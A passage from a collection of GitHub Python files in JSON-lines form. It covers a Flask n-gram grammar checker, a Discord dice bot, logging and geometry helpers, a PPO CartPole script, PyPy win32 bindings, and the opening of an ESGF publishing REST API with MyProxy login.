ModelBuilding()\r\n dic, tuned_hyperparameters_dic = model_builder.hyperparameter_tuning(2, threshold_values, k_values, dic_ngram_counts, test_sentences,\r\n true_labels, nr_unique_words)\r\n\r\n models_df = pd.DataFrame()\r\n models_df['(Threshold, K)'] = list(dic.keys())\r\n models_df['AUC_Score'] = [scores[0] for scores in list(dic.values())]\r\n models_df['F1_Score'] = [scores[1] for scores in list(dic.values())]\r\n models_df['Recall'] = [scores[2] for scores in list(dic.values())]\r\n models_df.to_csv('tuning.csv', index=False)\r\n tuned_threshold = models_df[models_df['AUC_Score'] == max(models_df['AUC_Score'])].tail(1)['(Threshold, K)'].iloc[0][0]\r\n tuned_k = models_df[models_df['AUC_Score'] == max(models_df['AUC_Score'])].tail(1)['(Threshold, K)'].iloc[0][1]\r\n\r\n return Response(f\"Hyperparameter Tuning Successfull!! Tuned Threshold : {tuned_threshold} , T\"\r\n f\"Tuned K-Smoothing Parameter : {tuned_k}\")\r\n\r\n except Exception as e:\r\n\r\n return Response(\"Error Occurred! %s\" % e)\r\n return Response(\"Hyperparameter Tuning Successfull!!\")\r\n\r\n\r\n\r\n@app.route(\"/predict\", methods=[\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef predict():\r\n if request.method == \"POST\":\r\n test_sentence = request.form['input_sentence']\r\n ngram = int(request.form['ngram'])\r\n\r\n with open('max_ngram.pkl', 'rb') as file:\r\n max_ngram = pickle.load(file)\r\n if (ngram >= 2) and (ngram <= max_ngram):\r\n test_sentences = [test_sentence]\r\n\r\n # Load the model\r\n # A) load the dictionary which includes the threshold and k-smoothing parameter\r\n with open('hyperparameters.json', 'r') as myfile:\r\n encoded_hyperparams_str = myfile.read()\r\n encoded_hyperparams = json.loads(encoded_hyperparams_str)\r\n threshold = encoded_hyperparams['threshold']\r\n k_smoothing_parameter = encoded_hyperparams['k']\r\n\r\n # B) load the nr of unique words (vocabulary size) and the n-grams counts dictionary\r\n with open('model_training_infos.pkl', 'rb') as file:\r\n encoded_training_infos = pickle.load(file)\r\n nr_unique_words = encoded_training_infos['nr_unique_words']\r\n dic_ngram_counts = encoded_training_infos['dic_ngram_counts']\r\n\r\n model_builder = ModelBuilding()\r\n output_dic, predictions = model_builder.ngram_language_model(ngram, test_sentences, dic_ngram_counts,\r\n threshold, nr_unique_words, k_smoothing_parameter)\r\n\r\n\r\n return render_template('home.html', prediction_text=output_dic[test_sentence][0])\r\n\r\n else:\r\n return render_template('home.html', prediction_text='Value of N must be greater than 1 and lower than ' + str(max_ngram+1))\r\n\r\n return render_template(\"home.html\")\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"Lori10/Grammer-Checker-Corrector-with-NgramLM-and-T5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23866886401","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass MyClient(discord.Client, commands.Cog):\n async def join(self, ctx):\n await ctx.author.voice.channel.connect()\n def Dice(self, d):\n if(d==\"\"): return 0\n else:\n num=str()\n d_type=str()\n p=0\n try:\n while d[p]!=\"d\":\n num+=d[p]\n p+=1\n p+=1\n while p < len(d):\n d_type += d[p]\n p += 1\n num = int(num)\n d_type = int(d_type)\n part_res = 0\n for i in range(num):\n part_res += random.randint(1, d_type)\n return part_res\n except IndexError: return int(num)\n\n def count(self, text):\n pointer=11\n part=str()\n res=0\n while pointer \n \"\"\"\n if content.item_code not in self.glossaries:\n log_items = [str(content.content_type), str(content.item_code), str(content.title)]\n return log_items\n return None\n \n def save_log(self, log_file, log_items):\n if len(log_items) > 0:\n with open(log_file, 'ab') as file:\n if isinstance(log_items[0], str):\n log = \"\\t\".join(log_items)\n log += \"\\r\\n\"\n file.write(log.encode('UTF-8'))\n else:\n for log in log_items:\n log = \"\\t\".join(log)\n log += \"\\r\\n\"\n file.write(log.encode('UTF-8'))\n \n","repo_name":"cephalopodblue/YouTubePerformanceIngest","sub_path":"util/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70361745769","text":"import math\nimport random\n\n\nclass CaculateAngle:\n\n def cross_point(self, line1, line2): # 计算交点函数\n x1 = line1[0] # 取四点坐标\n y1 = line1[1]\n x2 = line1[2]\n y2 = line1[3]\n\n x3 = line2[0]\n y3 = line2[1]\n x4 = line2[2]\n y4 = line2[3]\n\n if (x4 - x3) == 0: # L2直线斜率不存在操作\n k2 = None\n b2 = 0\n x = x3\n k1 = (y2 - y1) * 1.0 / (x2 - x1) # 计算k1,由于点均为整数,需要进行浮点数转化\n b1 = y1 * 1.0 - x1 * k1 * 1.0 # 整型转浮点型是关键\n y = k1 * x * 1.0 + b1 * 1.0\n elif (x2 - x1) == 0:\n k1 = None\n b1 = 0\n x = x1\n k2 = (y4 - y3) * 1.0 / (x4 - x3)\n b2 = y3 * 1.0 - x3 * k2 * 1.0\n y = k2 * x * 1.0 + b2 * 1.0\n else:\n k1 = (y2 - y1) * 1.0 / (x2 - x1) # 计算k1,由于点均为整数,需要进行浮点数转化\n k2 = (y4 - y3) * 1.0 / (x4 - x3) # 斜率存在操作\n b1 = y1 * 1.0 - x1 * k1 * 1.0 # 整型转浮点型是关键\n b2 = y3 * 1.0 - x3 * k2 * 1.0\n x = (b2 - b1) * 1.0 / (k1 - k2)\n y = k1 * x * 1.0 + b1 * 1.0\n return [x, y]\n\n # line1 = [0, 4, 0, 2]\n # line2 = [2, 0, 3, 0]\n # print(cross_point(line1, line2))\n\n # 三角形三条边长度求第二条边对角角度\n def caculate_from_triangle(self, line_a, line_b, line_c):\n \"\"\"\n 通过三角形三条边,利用三角函数计算cosB的值,再利用反余弦,求B的角度。\n :param line_a: 33\n :param line_b: 22\n :param line_c: 11\n\n :return: float\n \"\"\"\n line_a, line_b, line_c = line_a, line_b, line_c\n angle = (line_a ** 2 - line_b ** 2 + line_c ** 2) / (2 * line_a * line_c)\n return math.acos(angle) * 180 / math.pi\n\n # 三个点构成的夹角\n def caculate_from_line(self, point_A, point_B, point_C):\n \"\"\"\n 利用三个点,构建三角形\n :param point_A: [1,2]\n :param point_B: [1,2],夹角,所求的角度的点\n :param point_C: [1,2]\n :return: float\n \"\"\"\n point_a = point_A\n point_b = point_B\n point_c = point_C\n # print(point_a, point_b, point_c)\n x1 = point_b[0] - point_a[0]\n y1 = point_a[1] - point_b[1]\n\n x2 = point_c[0] - point_a[0]\n y2 = point_a[1] - point_c[1]\n\n x3 = point_c[0] - point_b[0]\n y3 = point_c[1] - point_b[1]\n\n line_c = math.sqrt(x1 ** 2 + y1 ** 2)\n line_b = math.sqrt(x2 ** 2 + y2 ** 2)\n line_a = math.sqrt(x3 ** 2 + y3 ** 2)\n\n return self.caculate_from_triangle(line_a, line_b, line_c)\n\n # 两条直线的夹角\n def caculate_from_points(self, line_regression_line_a, line_regression_line_b):\n \"\"\"\n 线性回归拟合出的两条直线\n :param line_regression_line_a: [[713, -18], [611, -95]]\n :param line_regression_line_b: [[611, -95], [312, -2]]\n :return: float\n \"\"\"\n list1 = list(range(3))\n for i in line_regression_line_a:\n for j in line_regression_line_b:\n if i == j:\n list1[1] = i\n line_regression_line_a.remove(i)\n line_regression_line_b.remove(j)\n list1[0] = random.choice(line_regression_line_a)\n list1[2] = random.choice(line_regression_line_b)\n point_A, point_B, point_C = list1[0], list1[1], list1[2]\n return self.caculate_from_line(point_A, point_B, point_C)\n","repo_name":"lishijia2740/batch_processing_work","sub_path":"Bingu/Bingu_C/caculate.py","file_name":"caculate.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4423512597","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 30 20:43:18 2021\n\n@author: yuki\n\"\"\"\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport math\n\n\n#データ読み込み及び平均0に修正\ndf = pd.read_csv('j.csv', header=1)\nprint(df)\n\n#print(df.iloc[5][\"second\"])\n\nVol_mean = df[\"Volt\"].mean()\nprint(Vol_mean)\n\nVol1_mean = df[\"Volt.1\"].mean()\nprint(Vol1_mean)\n\n\n\n#平均を0にするように平行移動\n#https://deepage.net/features/pandas-iteration.html\nfor j, i in df.iterrows():\n i[\"Volt.1\"] = i[\"Volt.1\"] - Vol1_mean\n i[\"Volt\"] = i[\"Volt\"] - Vol_mean\n\n\n\n#グラフを書いてみる\n#https://note.nkmk.me/python-pandas-plot/\ndf.plot()\ndf.plot(x=\"second\")\ndf.plot(x=\"second\", y=\"Volt.1\")\ndf.plot(x=\"second\", y=\"Volt\")\n\n\n\n\n#最大値のみ取り出す\nnew = pd.DataFrame()\n\nfor i in range(len(df)-2):\n if (df.loc[i][\"Volt.1\"] < df.loc[i+1][\"Volt.1\"]) and (df.loc[i+1][\"Volt.1\"] > df.loc[i+2][\"Volt.1\"]):\n #print(df.loc[i+1])\n print(df[i+1:i+2])\n new = new.append(df[i+1:i+2])\n\n\n\n\ndiffsec_mean=new[\"second\"].diff().mean()\nprint(new[\"second\"].diff())\nprint(\"時間差平均は\"+str(diffsec_mean))\nprint(\"周波数は\"+str(1/diffsec_mean))\n\n\nnew.plot(x=\"second\")\nnew.plot.scatter(x='second', y='Volt.1', alpha=0.5)\nnew.to_csv(\"newj.csv\")\n","repo_name":"yuki-2000/school","sub_path":"free-vibration.py","file_name":"free-vibration.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"237471898","text":"from upax.model.Question import Question\nfrom operator import itemgetter\nimport itertools\n\n\nclass Utils:\n\n @staticmethod\n def get_priority(str):\n payload = {\n 'ALTA': 1,\n 'MEDIA': 2,\n 'BAJA': 3\n }\n return payload[str]\n\n @staticmethod\n def get_register_type(str):\n payload = {\n 'STANDARD': 1,\n 'ADVANCED': 2\n }\n return payload[str]\n\n @staticmethod\n def set_visit_status(status):\n payload = {\n 0: 'Pendiente',\n 1: 'En revisión',\n 2: 'En proceso',\n 3: 'Rechazada',\n 4: 'Finalizada'\n }\n return payload[status]\n\n @staticmethod\n def set_status(id_status):\n payload = {\n 0: 'Eliminada',\n 1: 'Libre',\n 2: 'Sin Terminar',\n 3: 'Terminada',\n 4: 'Cancelada por Usuario',\n 5: 'Abandonada',\n 6: 'Vencida',\n 7: 'Evidencia extraida por usuario',\n 8: 'Desactivada',\n 9: 'Replantada',\n 12: 'Sincronizando Multimedia'\n }\n result = payload[id_status] if id_status in payload else 'Desactivada'\n return result\n\n @staticmethod\n def group_by_param(field_name, list_data):\n response = {}\n for key, group in itertools.groupby(sorted(list_data, key=itemgetter(field_name)), key=lambda x: x[field_name]):\n response[key] = list(group)\n return response\n\n @staticmethod\n def get_section(list_data):\n sections = []\n count = 0\n for data in list_data:\n if (data['FIIDTIPOPREGUNTA'] == 12):\n name = '' if isinstance(data['FCTEXTOPREGUNTA'], list) and len(data['FCTEXTOPREGUNTA']) == 0 else data[\n 'FCTEXTOPREGUNTA']\n count += 1\n sections.append({\n 'name': name,\n 'questions': [],\n 'id': count\n })\n else:\n question_id = data['FIIDPREGUNTA']\n question = '' if isinstance(data['FCTEXTOPREGUNTA'], list) and len(data['FCTEXTOPREGUNTA']) == 0 else \\\n data['FCTEXTOPREGUNTA']\n answer = data['FCTEXTORESPUESTACONTESTO']\n if answer is not None:\n sections[count - 1]['questions'].append(\n Question(id_question=question_id, name=question, answer=answer).build())\n else:\n if not (data['FIIDTIPOPREGUNTA'] == 17 or data['FIIDTIPOPREGUNTA'] == 27):\n sections[count - 1]['questions'].append(Question(id_question=question_id, name=question, answer=\"Sin respuesta\").build())\n return sections\n\n # las preguntas tienen que estar ordenadas\n @staticmethod\n def merge_answers_template(answers, template):\n\n merge_answers_template = []\n template_answers = template[0][\"questions\"]\n tamaño_template_answers = len(template_answers)\n first_answers_id = answers[0][\"FIIDPREGUNTA\"]\n # first_template_answers_id = template_answers[0][\"questionId\"]\n while first_answers_id != template_answers[0][\"questionId\"]:\n template_answers.pop(0)\n # recorrer las preguntas del template para de aqui armarlo\n # no pueden existir mas respuestas que preguntas\n '''\n for i in range(len(template_answers)):\n if template_answers[i][\"questionId\"] == answers[i][\"FIIDPREGUNTA\"]:\n print(\"iguales\")\n merge_answers_template.append(answers[i])\n else:\n print(\"no son iguales\")\n merge_answers_template.append(default_answer(template_answers[i][\"questionId\"],\n template_answers[i][\"question\"],\n \"Sin respuesta\"))'''\n x = 0\n y = 0\n while x < len(template_answers):\n if y < len(answers) and template_answers[x][\"questionId\"] == answers[y][\"FIIDPREGUNTA\"]:\n print(\"iguales\")\n merge_answers_template.append(answers[y])\n x = x + 1\n y = y + 1\n else:\n print(\"no son iguales\")\n pregunta_default = default_answer(template_answers[x][\"questionId\"],\n template_answers[x][\"question\"],\n \"Sin respuesta\")\n merge_answers_template.append(pregunta_default)\n x = x + 1\n return merge_answers_template\n\ndef default_answer(questionId, textoPregunta, textoRespuesta):\n answer = {\n 'FIIDENCUCONTESTADA': '',\n 'FIORDEN': '',\n 'FIIDPREGUNTA': questionId, # IMPORTANTE\n 'FCTEXTOPREGUNTA': textoPregunta, # data['FCTEXTOPREGUNTA']\n 'FCTEXTORESPUESTACONTESTO': textoRespuesta, # FCTEXTORESPUESTACONTESTO\n 'FIIDTIPOPREGUNTA': '',\n 'FIIDOPCIONRESPUESTA': '',\n 'FIIDPREGUNTAALTERNA': ''\n }\n return answer\n","repo_name":"rafael1996-git/upaxer-ws-cites-drake-pythom","sub_path":"common/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13296171043","text":"import os\nimport sys\nimport shutil\nimport json\nimport random\n\ndef display_json(json_dir):\n\tclass_list = []\n\tclass_dict = {}\n\tfor one_json in os.listdir(json_dir):\n\t\tjson_str = open(os.path.join(json_dir,one_json),'r', encoding='UTF-8')\n\t\tjson_dict = json.load(json_str)\n\t\tclass_name = json_dict[0]['label']\n\t\tif class_name not in class_list:\n\t\t\tclass_list.append(class_name)\n\t\t\tclass_dict[class_name] = 1\n\t\telse:\n\t\t\tclass_dict[class_name] += 1\n\tfor one_name in class_list:\n\t\tprint(one_name,class_dict[one_name])\n\tfor one_name in class_list:\n\t\tprint(class_dict[one_name])\n\t\n\t\t\n\nif __name__ == '__main__':\n\n\t# label_dir = \"D:/yang.xie/aidi_projects/check_class/xbq-b/RegClassify_0/label\"\n\t# display_json(label_dir)\n\n\t# label_dir = \"D:/yang.xie/aidi_projects/update-label0918/data/数据筛查_json/6通道_fix/label\"\n\tlabel_dir = r\"D:\\yang.xie\\aidi_projects\\20210129-pcb-newlabel\\20210419_big_set\\cls\\label\"\n\tdisplay_json(label_dir)\n\n\t\n\n\n\n\n\n\n\t\t\t\t\t\n\n\n\n","repo_name":"plzo/git-note","sub_path":"scripts/analysis_class_num.py","file_name":"analysis_class_num.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39659306119","text":"import sys\nfrom multiprocessing import Queue\nfrom functools import reduce\n\nfrom PyQt5 import QtCore\n\n\nclass TextStream:\n \"\"\"\n Writes to the appropriate queues.\n\n \"\"\"\n\n def __init__(self, window):\n self.queue = Queue()\n self.window = window\n\n def write(self, text):\n self.queue.put((0, str(text)))\n\n def write_html(self, html):\n self.queue.put((1, html))\n\n def flush(self):\n pass\n\n\nclass TextReceiver(QtCore.QObject):\n \"\"\"\n Hangs out a background thread and displays messages in the GUI.\n\n \"\"\"\n\n write_text_signal = QtCore.pyqtSignal(str)\n write_html_signal = QtCore.pyqtSignal(str)\n\n # An instance of a TextStream that has the queue that the worker thread reads from\n TEXT_STREAM = None\n\n # Receives text and writes it to the status bar\n TEXT_RECEIVER = None\n\n # The worker thread\n TEXT_THREAD = None\n\n # A reference to the main window\n WINDOW = None\n\n @staticmethod\n def redirect_close():\n \"\"\"\n Closes the worker thread\n\n \"\"\"\n TextReceiver.TEXT_RECEIVER.running = False\n TextReceiver.TEXT_THREAD.quit()\n\n @staticmethod\n def init(main_window, *args, **kwargs):\n \"\"\"\n Initializes the static members of the class and starts the background thread.\n\n \"\"\"\n TextReceiver.TEXT_STREAM = TextStream(main_window)\n\n TextReceiver.WINDOW = main_window\n # Create a receiver\n TextReceiver.TEXT_RECEIVER = TextReceiver(TextReceiver.TEXT_STREAM.queue, *args, **kwargs)\n # Create a thread for the receiver to install.py in\n TextReceiver.TEXT_THREAD = QtCore.QThread()\n # Connect the signal to the console output handler in the main window\n # Connect the console output signals\n TextReceiver.TEXT_RECEIVER.write_text_signal.connect(lambda st: main_window.text_log(st))\n TextReceiver.TEXT_RECEIVER.write_html_signal.connect(\n lambda html: main_window.html_log(html))\n # Move the receiver to the background thread\n TextReceiver.TEXT_RECEIVER.moveToThread(TextReceiver.TEXT_THREAD)\n # When the thread starts, start the text receiver\n TextReceiver.TEXT_THREAD.started.connect(TextReceiver.TEXT_RECEIVER.run)\n # Start thread\n TextReceiver.TEXT_THREAD.start()\n\n def __init__(self, queue, *_args, **_kwargs):\n QtCore.QObject.__init__(self)\n self.queue = queue\n self.running = True\n\n def run(self):\n \"\"\"\n Until the thread should close, read things from the queue and emit the appropriate signal to\n display them in\n the GUI.\n\n \"\"\"\n while self.running:\n (ty, text) = self.queue.get()\n if ty == 0:\n self.write_text_signal.emit(text)\n else:\n self.write_html_signal.emit(text)\n\n\ndef print_html_to_status_bar(arg):\n TextReceiver.TEXT_STREAM.write_html(arg)\n\n\ndef debug(*args, **kwargs):\n \"\"\"\n Prints directly to stderr. \n \n \"\"\"\n\n print(*args, file=sys.stderr, **kwargs)\n\n\ndef log(*args):\n \"\"\"\n Prints to the console_output with a fancy lookin log label.\n\n \"\"\"\n s = reduce(lambda l, r: f\"{l}, {r}\", args)\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'
[Log]
 {s}...')\n else:\n print_html_to_status_bar(f'
[Log]
 {s}')\n print(\"[Log] \", s, file=sys.__stdout__)\n\n\ndef err_log(dat):\n \"\"\"\n Prints to the console_output with a fancy lookin error label.\n\n \"\"\"\n s = str(dat)\n\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'
[Error]
 {s}...')\n else:\n print_html_to_status_bar(f'
[Error]
 {s}')\n print(\"[Err] \", str(dat), file=sys.__stdout__)\n\n\ndef debug_log(dat):\n \"\"\" \n Writes to the status bar and to stdout\n\n \"\"\"\n s = str(dat)\n if TextReceiver.TEXT_STREAM is not None:\n if len(s) > 128:\n s = s[0:128]\n print_html_to_status_bar(f'
[Debug]
 {s}...')\n else:\n print_html_to_status_bar(f'
[Debug]
 {s}')\n print(\"[Debug] \", str(dat), file=sys.__stdout__)\n","repo_name":"hitranonline/hapiest","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"11167323769","text":"\"\"\"\nlecture 21 \ntime\nspace\n\"\"\"\n\n# implementations of the same functional abstraction can require different amounts of time\n\n# e.g., how many factors does a positive integer n have\n\ndef factors(n):\n\t\"\"\"\n\ttime: number of division \n\t(1) slow: test each k from 1 through n --> n\n\t(2) fast: test each k from 1 to square root n\n\t\tfor every k, n/k is also a factor --> n ** 0.5\n\t\"\"\"\n\ttotal = 0\n\tfor k in range(1, n+1):\n\t\tif divides(k, n):\n\t\t\ttotal += 1\n\treturn total\n\nfrom math import sqrt\ndef factors_fast(n):\n\ttotal = 0\n\tsqrt_n = sqrt(n)\n\tk = 1\n\twhile k < sqrt_n:\n\t\tif divides(k, n):\n\t\t\ttotal += 2 # one for k, one for n/k\n\t\tk += 1\n\tif k*k == n:\n\t\ttotal += 1 # perfect sqrt, add the sqrt value, n/sqrt=sqrt, so just need add 1\n\treturn total\n\t\n\t\ndef divides(k, n):\n\treturn n%k == 0\n\t\n# the consumption of space\n\n# order of growth\n\n# exponentiation\ndef exp(b, n):\n\tif n == 0:\n\t\treturn 1\n\treturn b* exp(b, n-1)\n\t\ndef square(x):\n\treturn x*x\ndef fast_exp(b, n):\n\tif n == 0:\n\t\treturn 1\n\telif n % 2==0:\n\t\treturn square(fast_exp(b, n//2))\n\telse:\n\t\treturn b * fast_exp(b, n-1)\n\t\n","repo_name":"rarezhang/ucberkeley_cs61a","sub_path":"lecture/l21_time_space_growth.py","file_name":"l21_time_space_growth.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6444313226","text":"\"\"\" External functions accessing the win32 api.\nCommon types, functions from core win32 libraries, such as kernel32\n\"\"\"\n\nfrom pypy.rpython.tool import rffi_platform\nfrom pypy.translator.tool.cbuild import ExternalCompilationInfo\nfrom pypy.rpython.lltypesystem import lltype, rffi\nimport os\n\n# This module can be imported on any platform,\n# but most symbols are not usable...\nWIN32 = os.name == \"nt\"\n\nif WIN32:\n eci = ExternalCompilationInfo(\n includes = ['windows.h'],\n libraries = ['kernel32'],\n )\nelse:\n eci = ExternalCompilationInfo()\n\nclass CConfig:\n _compilation_info_ = eci\n\n if WIN32:\n DWORD_PTR = rffi_platform.SimpleType(\"DWORD_PTR\", rffi.LONG)\n WORD = rffi_platform.SimpleType(\"WORD\", rffi.UINT)\n DWORD = rffi_platform.SimpleType(\"DWORD\", rffi.UINT)\n BOOL = rffi_platform.SimpleType(\"BOOL\", rffi.LONG)\n INT = rffi_platform.SimpleType(\"INT\", rffi.INT)\n LONG = rffi_platform.SimpleType(\"LONG\", rffi.LONG)\n PLONG = rffi_platform.SimpleType(\"PLONG\", rffi.LONGP)\n LPVOID = rffi_platform.SimpleType(\"LPVOID\", rffi.INTP)\n LPCVOID = rffi_platform.SimpleType(\"LPCVOID\", rffi.VOIDP)\n LPCTSTR = rffi_platform.SimpleType(\"LPCTSTR\", rffi.CCHARP)\n LPDWORD = rffi_platform.SimpleType(\"LPDWORD\", rffi.INTP)\n SIZE_T = rffi_platform.SimpleType(\"SIZE_T\", rffi.SIZE_T)\n\n HRESULT = rffi_platform.SimpleType(\"HRESULT\", rffi.LONG)\n HLOCAL = rffi_platform.SimpleType(\"HLOCAL\", rffi.VOIDP)\n\n DEFAULT_LANGUAGE = rffi_platform.ConstantInteger(\n \"MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT)\")\n\n for name in \"\"\"FORMAT_MESSAGE_ALLOCATE_BUFFER FORMAT_MESSAGE_FROM_SYSTEM\n \"\"\".split():\n locals()[name] = rffi_platform.ConstantInteger(name)\n \n\nfor k, v in rffi_platform.configure(CConfig).items():\n globals()[k] = v\n\ndef winexternal(name, args, result):\n return rffi.llexternal(name, args, result, compilation_info=eci, calling_conv='win')\n\nif WIN32:\n HANDLE = rffi.ULONG\n LPHANDLE = rffi.CArrayPtr(HANDLE)\n HMODULE = HANDLE\n\n GetLastError = winexternal('GetLastError', [], DWORD)\n\n LoadLibrary = winexternal('LoadLibraryA', [rffi.CCHARP], rffi.VOIDP)\n GetProcAddress = winexternal('GetProcAddress',\n [rffi.VOIDP, rffi.CCHARP],\n rffi.VOIDP)\n FreeLibrary = winexternal('FreeLibrary', [rffi.VOIDP], BOOL)\n\n LocalFree = winexternal('LocalFree', [HLOCAL], DWORD)\n\n FormatMessage = winexternal(\n 'FormatMessageA',\n [DWORD, rffi.VOIDP, DWORD, DWORD, rffi.CCHARP, DWORD, rffi.VOIDP],\n DWORD)\n\n\n # A bit like strerror...\n def FormatError(code):\n \"Return a message corresponding to the given Windows error code.\"\n buf = lltype.malloc(rffi.VOIDPP.TO, 1, flavor='raw')\n\n msglen = FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |\n FORMAT_MESSAGE_FROM_SYSTEM,\n None,\n code,\n DEFAULT_LANGUAGE,\n rffi.cast(rffi.VOIDP, buf),\n 0, None)\n\n # FormatMessage always appends a \\n.\n msglen -= 1\n \n result = ''.join([buf[0][i] for i in range(msglen)])\n LocalFree(buf[0])\n return result\n\n def FAILED(hr):\n return rffi.cast(HRESULT, hr) < 0\n\n _GetModuleFileName = winexternal('GetModuleFileNameA',\n [HMODULE, rffi.CCHARP, DWORD],\n DWORD)\n\n def GetModuleFileName(module):\n size = 255 # MAX_PATH\n buf = lltype.malloc(rffi.CCHARP.TO, size, flavor='raw')\n res = _GetModuleFileName(module, buf, size)\n if not res:\n return ''\n else:\n return ''.join([buf[i] for i in range(res)])\n","repo_name":"paskma/pypy-sc","sub_path":"pypy/rlib/rwin32.py","file_name":"rwin32.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70538243688","text":"import gym\nimport tensorflow as tf\nimport numpy as np \n\nfrom training.PPO import *\n\nfrom models.discrete_policy import *\nfrom models.discrete_value import *\n\n## MAIN PART OF THE PROGRAM\nsess = tf.compat.v1.InteractiveSession()\n\npolicyNetFactory = lambda name: PolicyNetwork((4,), 2, [20,20], name=name)\nvalueNetFactory = lambda name: ValueNetwork((4,), 2, [20,20], name=name)\nenvironmentFactory = lambda: gym.make('CartPole-v0')\n\n# Create the agent\nppoAgent = PPOAgent(environmentFactory, valueNetFactory, policyNetFactory)\n\n\n# Create the session and initialize variables\nsess.run(tf.compat.v1.global_variables_initializer())\n\n\n\n# Train the agent\nppoAgent.train(10000)\n\n# Evaluate the agent\nenv = environmentFactory()\nenv.reset()\n\ndone = False\n\nwhile not done:\n\tstate = np.array(env.state)\n\taction = int(ppoAgent.policyNet(state)[0])\n\t_,_,done,_ = env.step(action)\n\tenv.render()\n\n\n","repo_name":"danathughes/ReinforcementLearning","sub_path":"run_ppo.py","file_name":"run_ppo.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33080577663","text":"import os\nimport json\nimport subprocess\nimport urlparse\nfrom myproxy.client import MyProxyClient\nfrom OpenSSL import crypto\nfrom pyasn1.type import useful\nfrom datetime import datetime\nimport logging\n\nfrom pyramid.httpexceptions import (\n HTTPFound,\n HTTPNotFound,\n)\n\nfrom pyramid.response import Response\nfrom pyramid.view import (\n view_config,\n forbidden_view_config,\n )\n\nfrom pyramid.security import (\n remember,\n forget,\n authenticated_userid,\n )\n\nfrom sqlalchemy.exc import DBAPIError\n\nfrom .models import (\n DBSession,\n Publisher,\n Submission,\n SubmissionMetadata,\n SubmissionFacet,\n FacetName,\n FacetValue,\n )\n\nimport utils\nimport authentication\n\nfrom celery import result\n\nfrom backend import (\n celery_app,\n transfer,\n scan,\n publish,\n )\n\n\nlog = logging.getLogger(__name__)\n\n\n@view_config(route_name='home', renderer='json', permission='view')\ndef home(request):\n return Response('ESGF Ingestion REST API\\n')\n\n\n@view_config(route_name='authenticate', renderer='json', permission='view')\ndef authenticate(request):\n if request.method != 'POST':\n return Response('Error: GET is not supported')\n\n data = json.loads(request.body.decode('utf-8'))\n\n openid = data.get('openid')\n password = data.get('password')\n\n (server, username) = utils.decompose_openid(openid)\n\n # Get X.509 certificate chain from MyProxy server\n log.info(\"Getting X.509 certificate from %s for %s\" % (server, username))\n myproxy_client = MyProxyClient(hostname=server)\n cred_chain_pem_tuple = None\n try:\n cred_chain_pem_tuple = myproxy_client.logon(username, password, lifetime=7*24*3600)\n except Exception as e:\n request.response.status = 400\n return {'status': 'Error', 'message': '%s' % e}\n\n cred_chain_pem = ''\n for e in cred_chain_pem_tuple:\n cred_chain_pem += e\n cert_pem = cred_chain_pem_tuple[0]\n\n # Get 'Not After' date\n cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)\n not_after_asn1 = cert.get_notAfter()\n not_after = not_after_asn1.decode()\n dt = datetime.strptime(not_after, '%Y%m%d%H%M%SZ')\n\n # Check the publisher role in X509v3 extension 1.2.3.4.4.3.2.1.7.8\n if not authentication.is_publisher(openid, cert):\n request.response.status = 400\n return {'status': 'Error', 'message': 'The user does not have the publisher role'}\n\n\n # Store the X.509 certificate chain in a tmp file, so it can be used later by esgcet\n cred_file = open('/tmp/x509in_%s_%s' % (server, username), 'w')\n cred_file.write(cred_chain_pem)\n cred_file.close()\n\n # Add or update Publisher object in the database\n publisher = DBSession.query(Publisher).filter(Publisher.openid==openid).first()\n if publisher:\n publisher.x509_pem = cred_chain_pem\n publisher.expiration = dt\n else:\n publisher = Publisher(openid=openid, x509_pem=cred_chain_pem, expiration=dt)\n DBSession.add(publisher)\n\n # Save openid in auth_tk cookie\n headers = remember(request, openid)\n resp = Response()\n resp.headers = headers\n return resp\n\n\n@view_config(route_name='workflow_create', renderer='json', permission='publish')\ndef workflow_create(request):\n if request.method != 'POST':\n return Response('Error:')\n\n openid = authenticated_userid(request)\n publisher = DBSession.query(Publisher).filter(Publisher.openid==openid).first()\n data = json.loads(request.body.decode('utf-8'))\n\n log.info('openid: %s' % openid)\n log.info('data: %s' % data)\n\n submission = Submission()\n\n metadata = data.get('metadata')\n if metadata:\n for md in metadata:\n name = md.get('name')\n value = md.get('value')\n if name is not None and value is not None:\n submission.submission_metadata.append(SubmissionMetadata(name=name, value=value))\n\n facets_data = data.get('facets')\n if facets_data:\n submission_facets = 